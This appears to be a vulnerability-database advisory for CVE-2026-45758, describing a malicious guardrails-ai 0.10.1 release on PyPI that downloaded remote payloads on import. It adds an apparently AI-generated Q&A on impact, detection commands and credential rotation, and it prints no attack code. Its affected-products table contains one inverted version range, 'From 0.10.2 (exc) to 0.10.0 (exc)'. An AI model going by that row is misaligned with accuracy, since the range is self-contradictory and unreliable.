CVE-2026-45758
Malicious Package in Guardrails AI Framework
Publication date: 2026-06-05
Last updated on: 2026-06-05
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| guardrails_ai | guardrails-ai | From 0.10.2 (exc) to 0.10.0 (exc) |
| guardrails-ai | guardrails-ai | From 0.10.0 (exc) to 0.10.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-506 | The product contains code that appears to be malicious in nature. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-45758 is a supply chain compromise involving the Python package guardrails-ai version 0.10.1. On May 11, 2026, an attacker published a malicious version of this package to PyPI, which contained embedded malicious code that could download and execute remote payloads when the package was imported.
The attack originated from a compromised GitHub Personal Access Token (PAT) of an employee, which was used to trigger GitHub Actions across multiple repositories to extract deploy tokens and publish the malicious package. The malicious code was injected into the guardrails/__init__.py file.
The malicious package was identified and quarantined by PyPI within approximately two hours, and no evidence of data exfiltration or malicious activity was found in system logs or requests to Guardrails AI infrastructure.
Users who installed version 0.10.1 are advised to uninstall it, rotate all credentials accessible from their machines (such as GitHub PATs, cloud keys, API tokens), audit their GitHub accounts for unauthorized workflows or repositories, and consider a full machine reimage if sensitive credentials were handled.
Safe versions are 0.10.0 and 0.10.2, and users should pin to these versions or install directly from GitHub.
How can this vulnerability impact me? :
This vulnerability can compromise your local environment if you installed the malicious guardrails-ai version 0.10.1. The malicious code can execute remote payloads, potentially allowing attackers to access sensitive credentials stored on your machine.
If compromised, attackers could gain unauthorized access to your GitHub account, cloud provider keys, package registry tokens, and API keys, leading to further security breaches.
The vulnerability has a critical severity score of 9.6, indicating high impact on confidentiality, integrity, and availability of your systems and data.
Users are advised to rotate all credentials accessible from the affected machine and audit their accounts to mitigate potential impacts.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection involves identifying if the malicious version 0.10.1 of guardrails-ai is installed on your system, as it contains injected malicious code in the guardrails/__init__.py file that downloads and executes a remote payload.
You can check the installed version of guardrails-ai with the following command:
- pip show guardrails-ai
Alternatively, to list all installed packages and their versions:
- pip list | grep guardrails-ai
To inspect the specific file for malicious code, you can check the contents of guardrails/__init__.py in the installed package directory for suspicious code that downloads and executes remote payloads.
Additionally, auditing network traffic for unexpected outbound connections to unknown URLs or IPs triggered by Python processes importing guardrails-ai may help detect malicious activity.
What immediate steps should I take to mitigate this vulnerability?
If you have installed guardrails-ai version 0.10.1, immediately uninstall this version and upgrade to the safe version 0.10.2 or downgrade to 0.10.0.
- Uninstall the malicious package: pip uninstall guardrails-ai
- Install a safe version: pip install guardrails-ai==0.10.0
Rotate all credentials accessible from the affected machine, including GitHub Personal Access Tokens (PATs), cloud provider keys, package registry tokens, and API keys.
Audit your GitHub account for unauthorized workflows or repositories.
Consider a full machine reimage if sensitive credentials were handled on the compromised system.
Snowglobe and Guardrails Hub users should rotate their API keys before May 13, 2026, at 2:00 PM Pacific to avoid service interruption.
Review GitHub Actions configurations and PAT policies to prevent similar supply chain attacks.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability involves a malicious package published to PyPI that could compromise local environments and expose credentials. Although no evidence of user data exfiltration was found, users who installed the affected version are advised to rotate credentials and audit accounts to prevent unauthorized access.
Because the incident involves potential credential compromise and supply chain attack, organizations using the affected package may face increased risk of unauthorized access to sensitive data, which could impact compliance with standards like GDPR and HIPAA that require protection of personal and sensitive information.
No direct evidence of data breach or exfiltration was reported, which may mitigate immediate compliance violations, but the need for credential rotation and auditing indicates a risk that must be managed to maintain compliance.